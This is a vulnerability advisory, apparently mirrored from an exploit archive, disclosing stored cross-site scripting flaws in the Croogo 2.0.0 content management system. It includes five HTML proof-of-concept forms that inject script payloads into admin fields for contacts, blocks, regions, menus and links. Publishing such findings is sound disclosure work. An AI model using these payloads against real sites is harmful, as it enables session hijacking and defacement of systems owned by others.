###########################

# Croogo 2.0.0 Multiple Stored XSS Vulnerabilities

###########################

<<<

Croogo 2.0.0 Multiple Stored XSS Vulnerabilities


Vendor: Fahad Ibnay Heylaal
Product web page: http://www.croogo.org
Affected version: 2.0.0

Summary: Croogo is a free, open source, content management system
for PHP, released under The MIT License. It is powered by CakePHP
MVC framework.

Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
scripting vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - http://www.zeroscience.mk
Macedonian Information Security Research And Development Laboratory


Advisory ID: ZSL-2014-5201
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php

Vendor: http://blog.croogo.org/blog/croogo-210-released


26.07.2014

>>>


------------------------
(XSS #1)
--------
POST parameters:

 - data[Contact][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
      <input type="hidden" name="data[Contact][id]" value="" />
      <input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS");</script>" />
      <input type="hidden" name="data[Contact][alias]" value="test" />
      <input type="hidden" name="data[Contact][email]" value="a@a.com" />
      <input type="hidden" name="data[Contact][body]" value="" />
      <input type="hidden" name="data[Contact][name]" value="" />
      <input type="hidden" name="data[Contact][position]" value="" />
      <input type="hidden" name="data[Contact][address]" value="" />
      <input type="hidden" name="data[Contact][address2]" value="" />
      <input type="hidden" name="data[Contact][state]" value="" />
      <input type="hidden" name="data[Contact][country]" value="" />
      <input type="hidden" name="data[Contact][postcode]" value="" />
      <input type="hidden" name="data[Contact][phone]" value="" />
      <input type="hidden" name="data[Contact][fax]" value="" />
      <input type="hidden" name="data[Contact][message_status]" value="0" />
      <input type="hidden" name="data[Contact][message_archive]" value="0" />
      <input type="hidden" name="data[Contact][message_notify]" value="0" />
      <input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
      <input type="hidden" name="data[Contact][message_captcha]" value="0" />
      <input type="hidden" name="data[Contact][status]" value="0" />
      <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #2)
--------
POST/PUT parameters:

 - data[Block][title]
 - data[Block][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
      <input type="hidden" name="_method" value="PUT" />
      <input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
      <input type="hidden" name="data[Block][id]" value="10" />
      <input type="hidden" name="data[Block][title]" value=""><script>alert(2);</script>" />
      <input type="hidden" name="data[Block][alias]" value=""><script>alert(3);</script>" />
      <input type="hidden" name="data[Block][region_id]" value="3" />
      <input type="hidden" name="data[Block][body]" value="1" />
      <input type="hidden" name="data[Block][class]" value="1" />
      <input type="hidden" name="data[Block][element]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Block][visibility_paths]" value="" />
      <input type="hidden" name="data[Block][params]" value="1" />
      <input type="hidden" name="data[Block][status]" value="1" />
      <input type="hidden" name="data[Block][show_title]" value="0" />
      <input type="hidden" name="data[Block][show_title]" value="1" />
      <input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #3)
--------
POST parameters:

 - data[Region][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
      <input type="hidden" name="data[Region][id]" value="" />
      <input type="hidden" name="data[Region][title]" value=""><script>alert(11);</script>" />
      <input type="hidden" name="data[Region][alias]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #4)
--------
POST parameters:

 - data[Menu][title]
 - data[Menu][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
      <input type="hidden" name="data[Menu][id]" value="" />
      <input type="hidden" name="data[Menu][title]" value=""><script>alert(22);</script>" />
      <input type="hidden" name="data[Menu][alias]" value=""><script>alert(33);</script>" />
      <input type="hidden" name="data[Menu][description]" value="ZSL" />
      <input type="hidden" name="data[Menu][params]" value="1" />
      <input type="hidden" name="data[Menu][status]" value="1" />
      <input type="hidden" name="data[Menu][publish_start]" value="1" />
      <input type="hidden" name="data[Menu][publish_end]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #5)
--------
POST parameters:

 - data[Link][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
      <input type="hidden" name="data[Link][id]" value="" />
      <input type="hidden" name="data[Link][menu_id]" value="6" />
      <input type="hidden" name="data[Link][parent_id]" value="" />
      <input type="hidden" name="data[Link][title]" value=""><script>alert(1);</script>" />
      <input type="hidden" name="data[Link][link]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Link][class]" value="scriptalert1script" />
      <input type="hidden" name="data[Link][description]" value="" />
      <input type="hidden" name="data[Link][rel]" value="" />
      <input type="hidden" name="data[Link][target]" value="" />
      <input type="hidden" name="data[Link][params]" value="" />
      <input type="hidden" name="data[Link][status]" value="0" />
      <input type="hidden" name="data[Link][publish_start]" value="" />
      <input type="hidden" name="data[Link][publish_end]" value="" />
      <input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-10-15]

###########################